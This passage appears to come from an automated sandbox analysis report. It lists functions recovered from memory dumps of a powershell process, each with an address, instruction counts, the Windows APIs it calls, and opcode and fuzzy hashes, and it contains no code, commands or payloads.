                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: |<Et
                                                                                                  • API String ID: 0-4156215977
                                                                                                  • Opcode ID: eb6f960ff61b1fe37935a71a1a7c5f194626f9b64d01c629203393ec286d9f93
                                                                                                  • Instruction ID: 998200b2d69c2fd8575c90349890313d0abecfdef91130199d3515d1f6e7b0fa
                                                                                                  • Opcode Fuzzy Hash: eb6f960ff61b1fe37935a71a1a7c5f194626f9b64d01c629203393ec286d9f93
                                                                                                  • Instruction Fuzzy Hash: EAC13874B00205CFDB14DFB9D854AAEBBF6AF88311F148429D911AB391DB76DD01CBA1
                                                                                                  Function 08336860 Relevance: 1.6, Strings: 1, Instructions: 342COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.1832009108.0000000008330000.00000040.00000800.00020000.00000000.sdmp, Offset: 08330000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_8330000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: "
                                                                                                  • API String ID: 0-123907689
                                                                                                  • Opcode ID: cb47603955721f7dc4e7963027d959517f372441b9ce92f9ae308d772b1faab0
                                                                                                  • Instruction ID: 94adb9755fa11cb43589bf4c38ed385b463d1be744735a562b0f5781835bd759
                                                                                                  • Opcode Fuzzy Hash: cb47603955721f7dc4e7963027d959517f372441b9ce92f9ae308d772b1faab0
                                                                                                  • Instruction Fuzzy Hash: 2DE11974A00219DFDB04CFA5C985BEDB7F6FB88301F248169E905AB251EB72AD45CF60
                                                                                                  Function 081C06D8 Relevance: 1.6, Strings: 1, Instructions: 333COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.1828356432.00000000081C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 081C0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_81c0000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID: 0-3916222277
                                                                                                  • Opcode ID: 958c18071b5ba2c13ed129c8eb59dc202055f860c4ca6713bb630fbf77e287d7
                                                                                                  • Instruction ID: d9dc8b9ec98e3a7eb2742b41727ff530b53511156cc698a23ec9c59f74f13166
                                                                                                  • Opcode Fuzzy Hash: 958c18071b5ba2c13ed129c8eb59dc202055f860c4ca6713bb630fbf77e287d7
                                                                                                  • Instruction Fuzzy Hash: 41E15834A00609CFDB54DF68D884A9DB7F2FF88311F1581A8E8069B366DB71ED42CB91
                                                                                                  Function 082066C0 Relevance: 1.6, Strings: 1, Instructions: 324COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.1828712003.0000000008200000.00000040.00000800.00020000.00000000.sdmp, Offset: 08200000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_8200000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: "Et
                                                                                                  • API String ID: 0-64186490
                                                                                                  • Opcode ID: 05045370fc769efdd6e9e6fdceabed839e0f67ad365cb6251af831efc8cfa787
                                                                                                  • Instruction ID: 44d3ca79083633b0d1d8189c8172617a69568ed121e43365a1f72b673eeeecd2
                                                                                                  • Opcode Fuzzy Hash: 05045370fc769efdd6e9e6fdceabed839e0f67ad365cb6251af831efc8cfa787
                                                                                                  • Instruction Fuzzy Hash: 47C19C34B002059FDB44EB78D8946AEB7E6EFC8310F14847AE90ADB395DE349D46CB91
                                                                                                  Function 08138C30 Relevance: 1.6, APIs: 1, Instructions: 67threadCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • SetThreadUILanguage.KERNELBASE ref: 08138CC2
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.1827850263.0000000008130000.00000040.00000800.00020000.00000000.sdmp, Offset: 08130000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_8130000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: LanguageThread
                                                                                                  • String ID:
                                                                                                  • API String ID: 243849632-0
                                                                                                  • Opcode ID: 8efc47b29ae6d0e59e661f304a157134974df3699aee8630af7017c2e84d18f7
                                                                                                  • Instruction ID: 3bd75377f21f594557f6093f8032d62e877bbfc8c0a4c748a4aeaf68a107b68b
                                                                                                  • Opcode Fuzzy Hash: 8efc47b29ae6d0e59e661f304a157134974df3699aee8630af7017c2e84d18f7
                                                                                                  • Instruction Fuzzy Hash: E9218CB58093888FDB11CFA9C4447DEBFF4EF09211F14849ED494A7251C378A945CBA2
                                                                                                  Function 029DD921 Relevance: 1.6, APIs: 1, Instructions: 60COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • ComputeAccessTokenFromCodeAuthzLevel.ADVAPI32(?,?,?,?,?), ref: 029DD99E
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.1811965993.00000000029D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029D0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_29d0000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AccessAuthzCodeComputeFromLevelToken
                                                                                                  • String ID:
                                                                                                  • API String ID: 132034935-0
                                                                                                  • Opcode ID: 4d8115084064dd8f93c44cce8bd26883ecc80da2ab13ee5ccb7a6c0277e238b4
                                                                                                  • Instruction ID: 053219d9513b12274705893af130bef2bc279f39bdb6c7007d55ba1899775550
                                                                                                  • Opcode Fuzzy Hash: 4d8115084064dd8f93c44cce8bd26883ecc80da2ab13ee5ccb7a6c0277e238b4
                                                                                                  • Instruction Fuzzy Hash: C72115769002499FCB10CF9AC944BDFBBF4EB48314F15842AE818A7250C3789A55CFA1
                                                                                                  Function 029DD928 Relevance: 1.6, APIs: 1, Instructions: 58COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • ComputeAccessTokenFromCodeAuthzLevel.ADVAPI32(?,?,?,?,?), ref: 029DD99E
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.1811965993.00000000029D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029D0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_29d0000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AccessAuthzCodeComputeFromLevelToken
                                                                                                  • String ID:
                                                                                                  • API String ID: 132034935-0
                                                                                                  • Opcode ID: b000e56dc6bb895b2b26cf0a8917faacef14bd47d336d0ee8ad77e7158247029
                                                                                                  • Instruction ID: fc275ab80e361841d05953b71d4178b9d0800d868b46a26155021711c16e28aa
                                                                                                  • Opcode Fuzzy Hash: b000e56dc6bb895b2b26cf0a8917faacef14bd47d336d0ee8ad77e7158247029
                                                                                                  • Instruction Fuzzy Hash: 022124B69003499FCB10CF9AC884BDEBBF4EB48314F10842AE918A7250D379A941CFA1
                                                                                                  Function 029D4118 Relevance: 1.6, APIs: 1, Instructions: 56COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • GetFileAttributesW.KERNELBASE(00000000), ref: 029D4FB0
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.1811965993.00000000029D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029D0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_29d0000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AttributesFile
                                                                                                  • String ID:
                                                                                                  • API String ID: 3188754299-0
                                                                                                  • Opcode ID: 85cb9f8357f56553bfcb8eb9b87ba6bb89f47523b229d4ef5cb2733f5110e202
                                                                                                  • Instruction ID: c313bae665d70178d40bd6fd88cc9dbccf955b76a813a35ce23181f2e690ec77
                                                                                                  • Opcode Fuzzy Hash: 85cb9f8357f56553bfcb8eb9b87ba6bb89f47523b229d4ef5cb2733f5110e202
                                                                                                  • Instruction Fuzzy Hash: 572133B1D046199BDB10CF9AD544B9EFBF4EB48310F14816AE818A7310D774A940CFE5
                                                                                                  Function 029D4F38 Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • GetFileAttributesW.KERNELBASE(00000000), ref: 029D4FB0
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.1811965993.00000000029D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029D0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_29d0000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AttributesFile
                                                                                                  • String ID:
                                                                                                  • API String ID: 3188754299-0
                                                                                                  • Opcode ID: d88915d2f0bcb22b212a851d665759738f9c472a10b91bbb7cbd7a3a3a88744e
                                                                                                  • Instruction ID: c53bcc63abc3e5f8e8928827b448255f2defa02e631f3bc0e2fa36f45fe5814b
                                                                                                  • Opcode Fuzzy Hash: d88915d2f0bcb22b212a851d665759738f9c472a10b91bbb7cbd7a3a3a88744e
                                                                                                  • Instruction Fuzzy Hash: A82136B1D0061A8FCB10CFAAD544B9EFBF4FB48320F10826AD818A7350D374A941CFA1
                                                                                                  Function 08136B74 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • SetThreadUILanguage.KERNELBASE ref: 08138CC2
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.1827850263.0000000008130000.00000040.00000800.00020000.00000000.sdmp, Offset: 08130000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_8130000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: LanguageThread
                                                                                                  • String ID:
                                                                                                  • API String ID: 243849632-0
                                                                                                  • Opcode ID: d6df495d812c929b7ecfbf5519edcec2627cd4141c26ef89a9aff0eca968803b
                                                                                                  • Instruction ID: c968ff072ba899a4ea119fb0a5e90d8810bb0180c92d567a342a2794d377c21f
                                                                                                  • Opcode Fuzzy Hash: d6df495d812c929b7ecfbf5519edcec2627cd4141c26ef89a9aff0eca968803b
                                                                                                  • Instruction Fuzzy Hash: F51125B48006588FDB10DF9AD584BEFFBF4EB48215F20846AE558A7250C378A945CFA5
                                                                                                  Function 029DDD58 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.1811965993.00000000029D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029D0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_29d0000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: InfoSystem
                                                                                                  • String ID:
                                                                                                  • API String ID: 31276548-0
                                                                                                  • Opcode ID: 411153bd6510fb4190df22e59ea5b843763ebda39c3cc60c6a7a52a41f3859c2
                                                                                                  • Instruction ID: b43298fd625602eebb3cf289cf6878117349d53844d7cc98dd43ad8a0d682b33
                                                                                                  • Opcode Fuzzy Hash: 411153bd6510fb4190df22e59ea5b843763ebda39c3cc60c6a7a52a41f3859c2
                                                                                                  • Instruction Fuzzy Hash: 41110FB5D002599BCB00CF9AD544BDEFBF4EB49214F24815AD818B7640C3B8AA05CFA1
                                                                                                  Function 07FB10F8 Relevance: 1.5, Strings: 1, Instructions: 257COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.1823717456.0000000007FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07FB0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_7fb0000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: ;;
                                                                                                  • API String ID: 0-1770558080
                                                                                                  • Opcode ID: 887e88b7ed585bd43e38bb93801355cd9623b89e9b01d676ad6a6f5b17101ada
                                                                                                  • Instruction ID: 9e3f41e59cb4ad1be3b884be57f98c083088bda7d42f6444fa70503613c0c3ad
                                                                                                  • Opcode Fuzzy Hash: 887e88b7ed585bd43e38bb93801355cd9623b89e9b01d676ad6a6f5b17101ada
                                                                                                  • Instruction Fuzzy Hash: 19A15BB4A00209DFD728DF65D864AADB7B2FF89311F188569E416DB361DB31EC46CB40
                                                                                                  Function 08280C40 Relevance: 1.5, Strings: 1, Instructions: 230COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.1829558126.0000000008280000.00000040.00000800.00020000.00000000.sdmp, Offset: 08280000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_8280000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: Y=t
                                                                                                  • API String ID: 0-1974659538
                                                                                                  • Opcode ID: 4dae16ea0718c5236a80b03a0430fa446dd7734af969031d1155ffd96bd0501d
                                                                                                  • Instruction ID: cc8ff2c011eb7f25c05be53e12cc1f74c7e9c2649e352465bc7c68d19e172ac0
                                                                                                  • Opcode Fuzzy Hash: 4dae16ea0718c5236a80b03a0430fa446dd7734af969031d1155ffd96bd0501d
                                                                                                  • Instruction Fuzzy Hash: A1A11374A01705DFCB19DFA4D588A6EBBB2FF89312B10856DD40A9B391DB31EC86CB41
                                                                                                  Function 081C75EF Relevance: 1.4, Strings: 1, Instructions: 125COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.1828356432.00000000081C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 081C0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_81c0000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: l<>t
                                                                                                  • API String ID: 0-1801987339
                                                                                                  • Opcode ID: 44100086ecbf839ab8dd94acbdab23ae00ecd128a773663bcc83aabe27cfe6b1
                                                                                                  • Instruction ID: 529d32329dc0790b18cdf0c72bb5f73eb1acafc4ecb46d51408462ec652f635d
                                                                                                  • Opcode Fuzzy Hash: 44100086ecbf839ab8dd94acbdab23ae00ecd128a773663bcc83aabe27cfe6b1
                                                                                                  • Instruction Fuzzy Hash: 454160356006049FEB15CF69C894BAE77A2EF88311F10856CE906AB780DBB1AC41CF61
                                                                                                  Function 081C7600 Relevance: 1.4, Strings: 1, Instructions: 123COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.1828356432.00000000081C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 081C0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_81c0000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: l<>t
                                                                                                  • API String ID: 0-1801987339
                                                                                                  • Opcode ID: 085817487b2836c9bd04249e1f1f1ff66ad505a7b4df4c1b486f8b6c08abfc24
                                                                                                  • Instruction ID: 2b3ebce48f31a411848a22e7a285f38637e29eba8461f1ad20c630677f0976e0
                                                                                                  • Opcode Fuzzy Hash: 085817487b2836c9bd04249e1f1f1ff66ad505a7b4df4c1b486f8b6c08abfc24
                                                                                                  • Instruction Fuzzy Hash: 31412F357006049FEB14DF69C894BAA77A2EF8C311F10856CE906AB790DBB5ED51CFA0
                                                                                                  Function 0820A700 Relevance: 1.4, Strings: 1, Instructions: 117COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.1828712003.0000000008200000.00000040.00000800.00020000.00000000.sdmp, Offset: 08200000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_8200000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: k&
                                                                                                  • API String ID: 0-2956305165
                                                                                                  • Opcode ID: e43c4e7727eee839e29ecea1c6e07cbed48691b1b0a378cebfb88619c7913240
                                                                                                  • Instruction ID: 4a774a687acddaa091624cc4751637747e490eb77e47f8b61886461cf4f9506e
                                                                                                  • Opcode Fuzzy Hash: e43c4e7727eee839e29ecea1c6e07cbed48691b1b0a378cebfb88619c7913240
                                                                                                  • Instruction Fuzzy Hash: B041D231B106059FCB14DBBDE85069EB7E5FF84311B00C529D51ADB281EB31E9018BA1
                                                                                                  Function 08151AD8 Relevance: 1.3, Strings: 1, Instructions: 82COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.1828046144.0000000008150000.00000040.00000800.00020000.00000000.sdmp, Offset: 08150000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_8150000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: 7L
                                                                                                  • API String ID: 0-2193955144
                                                                                                  • Opcode ID: 071631f5b5b883de0e0e204bcc7a7e25b1de19588f0d2da15c700f58e75ea3c4
                                                                                                  • Instruction ID: 9e79913fcd0e1ed44cda6ee2a2c1a035ffb1668850c4439b4b41e2a58e687b7f
                                                                                                  • Opcode Fuzzy Hash: 071631f5b5b883de0e0e204bcc7a7e25b1de19588f0d2da15c700f58e75ea3c4
                                                                                                  • Instruction Fuzzy Hash: 5721FE30200701DFD7069B29D85069E77AAEF82311F08C5BED809CF242EF71DD0687A2
                                                                                                  Function 08344650 Relevance: 1.3, Strings: 1, Instructions: 80COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.1832818931.0000000008340000.00000040.00000800.00020000.00000000.sdmp, Offset: 08340000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_8340000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: |@Et
                                                                                                  • API String ID: 0-2857452445
                                                                                                  • Opcode ID: 2a86d09e5771b4bf68ca5a2a3852967246d30329bb053a6d2f14abb8f490cbd2
                                                                                                  • Instruction ID: 46718a53ad0605a6cc6d6f608086dfbceb88bcb0884b28d744ab002dfbaf3981
                                                                                                  • Opcode Fuzzy Hash: 2a86d09e5771b4bf68ca5a2a3852967246d30329bb053a6d2f14abb8f490cbd2
                                                                                                  • Instruction Fuzzy Hash: 1B313A30A01218CFDF14DFA9C80079EB7F6FF89211F248069D519AB354DB79AD02CBA5
                                                                                                  Function 0820A6F1 Relevance: 1.3, Strings: 1, Instructions: 63COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.1828712003.0000000008200000.00000040.00000800.00020000.00000000.sdmp, Offset: 08200000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_8200000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: k&
                                                                                                  • API String ID: 0-2956305165
                                                                                                  • Opcode ID: 3d4a109c29eca14101e36cf87ec1cba2a36d450154ce9621fe21cc0395f648cd
                                                                                                  • Instruction ID: 9850da40ec934703789925c7aa87a225982f57dee73b952b0ff9d05f16549056
                                                                                                  • Opcode Fuzzy Hash: 3d4a109c29eca14101e36cf87ec1cba2a36d450154ce9621fe21cc0395f648cd
                                                                                                  • Instruction Fuzzy Hash: F811CD70A11744AFCB05EBBDD9505AEBFF5EF89210B04C26DD40ADB292DB31E905CBA1
                                                                                                  Function 08204D2F Relevance: 1.3, Strings: 1, Instructions: 58COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.1828712003.0000000008200000.00000040.00000800.00020000.00000000.sdmp, Offset: 08200000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_8200000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: Ld>t
                                                                                                  • API String ID: 0-2851468605
                                                                                                  • Opcode ID: f6a614a58650528c8fc5ddc354ae1ac0ab60a6578e2a015e329505a97093e86c
                                                                                                  • Instruction ID: f2e845a19a8650f313ee6ddd5870c78de8c9c21fda381293582868f0bd65d216
                                                                                                  • Opcode Fuzzy Hash: f6a614a58650528c8fc5ddc354ae1ac0ab60a6578e2a015e329505a97093e86c
                                                                                                  • Instruction Fuzzy Hash: 7A1132343002109FC304EB38D89492A37AAEFC825172480BDD604CB3A2DF31DC01CBA4
                                                                                                  Function 08152920 Relevance: .6, Instructions: 598COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.1828046144.0000000008150000.00000040.00000800.00020000.00000000.sdmp, Offset: 08150000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_8150000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: ae698349086bf057ae3a3aa28c9fcd0eb7f3894914feefe536ca242859f33264
                                                                                                  • Instruction ID: 7a61db85cca42b08e8ca6fbe0476fce1268d1db35cc53bc10bc0e723e9bb00f5
                                                                                                  • Opcode Fuzzy Hash: ae698349086bf057ae3a3aa28c9fcd0eb7f3894914feefe536ca242859f33264
                                                                                                  • Instruction Fuzzy Hash: 18425631A00204CFDB14CFA8C984A9EB7F2FF89311F158568E816AB365DB79ED45CB50
                                                                                                  Function 081520D8 Relevance: .6, Instructions: 575COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.1828046144.0000000008150000.00000040.00000800.00020000.00000000.sdmp, Offset: 08150000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_8150000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 2f15388f4fd04c48d9b61b1348a42d97150cdff31ee32911e9c2d839625e71c8
                                                                                                  • Instruction ID: 868f612d654fe1e56462948967f5d31052562639e8e5b82908179a84184b5c12
                                                                                                  • Opcode Fuzzy Hash: 2f15388f4fd04c48d9b61b1348a42d97150cdff31ee32911e9c2d839625e71c8
                                                                                                  • Instruction Fuzzy Hash: A6324C35A00208DFDB09DFA4D894A9DBBF6FF88301F158469E816AB365DB71AC41CF50
                                                                                                  Function 082B5B38 Relevance: .5, Instructions: 503COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.1830062200.00000000082B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 082B0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_82b0000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 2a241c9ba3e4b21c16acb3b441bf3491ad1eba13abba5327223b80aca0dba61a
                                                                                                  • Instruction ID: bf89e7de2a15de96473645d067e7398e5cebe785057920f211246e9db46c274b
                                                                                                  • Opcode Fuzzy Hash: 2a241c9ba3e4b21c16acb3b441bf3491ad1eba13abba5327223b80aca0dba61a
                                                                                                  • Instruction Fuzzy Hash: 86225974A11606DFDB14DF68C584AAEB7F2FF88301F158568E906AB3A1DB34ED42CB50
                                                                                                  Function 0828CAB0 Relevance: .5, Instructions: 489COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.1829558126.0000000008280000.00000040.00000800.00020000.00000000.sdmp, Offset: 08280000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_8280000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: c44dbfac334ca58481c0786cd687307a1487d5e6073ef58d8f3881e525be94a3
                                                                                                  • Instruction ID: 039a87d952cbf87deee47cad391159dc3d6dfa04a346e37457098e9469ecd1cd
                                                                                                  • Opcode Fuzzy Hash: c44dbfac334ca58481c0786cd687307a1487d5e6073ef58d8f3881e525be94a3
                                                                                                  • Instruction Fuzzy Hash: 01227030A11209EFDB55EFA8D844A9DBBB6FF88311F108169E805AB391CB35ED45CF91
                                                                                                  Function 083467C8 Relevance: .5, Instructions: 467COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.1832818931.0000000008340000.00000040.00000800.00020000.00000000.sdmp, Offset: 08340000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_8340000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 7f949b4bc8ac2c0454704352604ad44c2ff67567a2331db237bf51ad0d5bdc0c
                                                                                                  • Instruction ID: aa30ebdab849cc8408657056ded3d711b4dd8fb6c8f651a60771bd6e6d68a9de
                                                                                                  • Opcode Fuzzy Hash: 7f949b4bc8ac2c0454704352604ad44c2ff67567a2331db237bf51ad0d5bdc0c
                                                                                                  • Instruction Fuzzy Hash: AC121234A00604CFDB14DFA8D585A9DB7F2FF89311F1584A9E805AB3A1EB71ED46CB81
                                                                                                  Function 08153A88 Relevance: .4, Instructions: 440COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.1828046144.0000000008150000.00000040.00000800.00020000.00000000.sdmp, Offset: 08150000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_8150000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 3705fd0957fc396ea908d4ece498ebd048676bb963783bec6c19f0822112787e
                                                                                                  • Instruction ID: 8c67f4be5edc1d61d1af69c762f6760d57d6f4dd14397465751333dacb645e14
                                                                                                  • Opcode Fuzzy Hash: 3705fd0957fc396ea908d4ece498ebd048676bb963783bec6c19f0822112787e
                                                                                                  • Instruction Fuzzy Hash: 15F19E34700200DFDB19DE64C844BAA7BF6EF89382F148469E825DB395DB75DD42CBA1
                                                                                                  Function 08159420 Relevance: .4, Instructions: 433COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.1828046144.0000000008150000.00000040.00000800.00020000.00000000.sdmp, Offset: 08150000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_8150000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 87d90d14a636be88bf2b9e0f08c8b14433d9b8a71b418bc474f40850bfe0fc20
                                                                                                  • Instruction ID: 88630e2041606c40d71532dfcbd5cf5bcdf98273491b89b82d7f0ebcb59d7a92
                                                                                                  • Opcode Fuzzy Hash: 87d90d14a636be88bf2b9e0f08c8b14433d9b8a71b418bc474f40850bfe0fc20
                                                                                                  • Instruction Fuzzy Hash: DBF15B34B00204DFDB049F64D854BAABBF6EF88351F198069E816DB3A1DB75DC45CBA2
                                                                                                  Function 07FD0688 Relevance: .4, Instructions: 430COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.1823863330.0000000007FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07FD0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_7fd0000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 817f63e7625c5121f7ca1d751f5f4a5a2a7ff39a400c0cb30ca5e4862aea59e8
                                                                                                  • Instruction ID: 1489c82e7d447d99b1e247495868847cb04cf2ccd02f85eb68d5444e227cc993
                                                                                                  • Opcode Fuzzy Hash: 817f63e7625c5121f7ca1d751f5f4a5a2a7ff39a400c0cb30ca5e4862aea59e8
                                                                                                  • Instruction Fuzzy Hash: D2E1F2B5B043099FD7259B68D850BAABBE3EF85210F1DC09AD4459F392CE71CC41CBA1
                                                                                                  Function 082BC303 Relevance: .4, Instructions: 418COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.1830062200.00000000082B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 082B0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
